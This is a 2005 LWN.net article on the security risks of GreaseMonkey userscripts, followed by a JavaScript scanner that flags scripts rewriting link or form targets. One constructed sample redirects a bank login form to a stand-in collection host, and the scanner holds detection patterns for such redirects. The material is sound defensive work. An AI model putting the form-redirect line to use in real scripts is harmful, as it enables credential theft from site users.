GreaseMonkey: a two-edged sword
[Posted March 23, 2005 by corbet]
The Mozilla Firefox extension mechanism is a powerful feature; it gives
browser users a great deal of flexibility in controlling how things work.
One of the extensions attracting the most attention in the last few months
is GreaseMonkey. It is, in
fact, a classic example of why free software is a great thing, but also an
illustration of how users can be invited to harm themselves.

The core idea behind GreaseMonkey is simple: it allows the user to
associate JavaScript programs with specific sites on the net. When one of
the identified pages (as determined by a regular expression) is loaded, the
script gets a chance to rewrite things before the page is displayed.
GreaseMonkey is, in other words, a mechanism which enables readers to
automatically rework web pages into the form they would have liked them to
be in the first place.

The GreaseMonkey script repository shows that there is a demand for this
capability. Scripts have been posted which:
- Remove articles or comments posted by specific users. Perhaps
this would be a quick way to implement the comment filtering features
occasionally requested for LWN.net.
- Rewrite web pages to get rid of intrusive navigation bars,
interstitial ad pages, etc. For those who want more ads, there is a
script which inserts Google ads into the handful of pages on the net
which do not yet have them.
- Redirect SourceForge download links to skip the mirror selection page
and simply get the requested files.
- Delete Michael Jackson stories from certain news sites
("Best. Userscript. Ever.").
- Rewrite Paul Graham's articles for better readability.
- Create cross links between Netflix and IMDB.
And so on; the list appeared to be growing as this article was being
written.

The operators of various web sites will, beyond doubt, get upset if
GreaseMonkey use takes off. To anybody who wishes to have a high degree of
control over the appearance and use of their site, GreaseMonkey will be a
threat. But GreaseMonkey is a clear expression of software freedom: we
will control how things work on our own computers. Our tools are
written to maximize that control, and there is little that can be done
about it.

GreaseMonkey does, however, potentially threaten that control in a
different way. A tool which encourages users to download and run scripts
from random parts of the net would appear to be an open door for security
problems. If the browser's sandboxing works properly, a script should not
be able to affect the system outside of the browser. But even the mere
ability to rewrite HTML is asking for some trouble: how long will it be
until some phisher posts a script that, while perhaps doing something
useful, also redirects links within financial sites? It is not entirely
clear how that sort of problem can be addressed - the same capability which
can redirect all New York Times links to the "printable" version can point
a password submission form to a third-party site.

In other words, while GreaseMonkey is a cool and powerful tool, it should
be used with great care. Install a minimum number of scripts, look them
over first, and, preferably, write them yourself. As the GreaseMonkey
community grows, there will certainly be exploit attempts. Firefox is a
relatively secure web browser; it would be a shame to ruin that by inviting
in random malware from the net.
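
One way to start "looking them over first" is a text scan run before a script is installed. The sketch below is an added example, not GreaseMonkey's code or anything from the script repository: it lists the lines that rewrite link or form targets and the hard-coded URLs that fall outside the sites the script says it applies to. It assumes the script declares its sites in `// @include` metadata lines; the rule names and both sample scripts are constructed for illustration.

```javascript
// Added example: static pre-install review of a userscript's source text.
// Assumes Greasemonkey "// @include ..." metadata lines; rule names are invented here.

// Hosts named by @include lines; "*" when a pattern does not pin a single host.
function includeHosts(src) {
  const hosts = [];
  for (const m of src.matchAll(/^\s*\/\/\s*@include\s+(\S+)/gm)) {
    const h = m[1].match(/^[a-z*]+:\/\/([^\/*]+)\//i);
    hosts.push(h ? h[1].toLowerCase() : "*");
  }
  return hosts;
}

// Assignment to a link or form target: x.href = ..., x.action = ..., setAttribute("action", ...)
const WRITES_TARGET = /\.(action|href)\s*=(?!=)|setAttribute\(\s*["'](action|href)["']/i;

function auditUserscript(src) {
  const findings = [];
  const hosts = includeHosts(src);
  if (hosts.length === 0 || hosts.includes("*"))
    findings.push({ line: 0, rule: "unscoped-include" });
  src.split("\n").forEach((text, i) => {
    if (/^\s*\/\//.test(text)) return; // skip metadata and comment lines
    if (WRITES_TARGET.test(text)) findings.push({ line: i + 1, rule: "rewrites-target" });
    for (const u of text.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
      const host = u[1].toLowerCase();
      if (!hosts.some((h) => host === h || host.endsWith("." + h)))
        findings.push({ line: i + 1, rule: "off-scope-url", host });
    }
  });
  return findings;
}

// Constructed samples: both rewrite targets, only the second leaves its own site.
const BENIGN = [
  "// ==UserScript==",
  "// @include  http://news.example/*",
  "// ==/UserScript==",
  "for (const a of document.links)",
  "  a.href = a.href.replace('/story/', '/print/');",
].join("\n");
const SUSPECT = [
  "// ==UserScript==",
  "// @include  https://bank.example/*",
  "// ==/UserScript==",
  "document.forms[0].action = 'https://elsewhere.invalid/collect';",
].join("\n");

for (const s of [BENIGN, SUSPECT]) console.log(auditUserscript(s));
```

Both samples trip `rewrites-target`, which is the article's point about one capability serving both uses; only the second adds `off-scope-url`. The scan only points at lines to read first and does not replace reading the script.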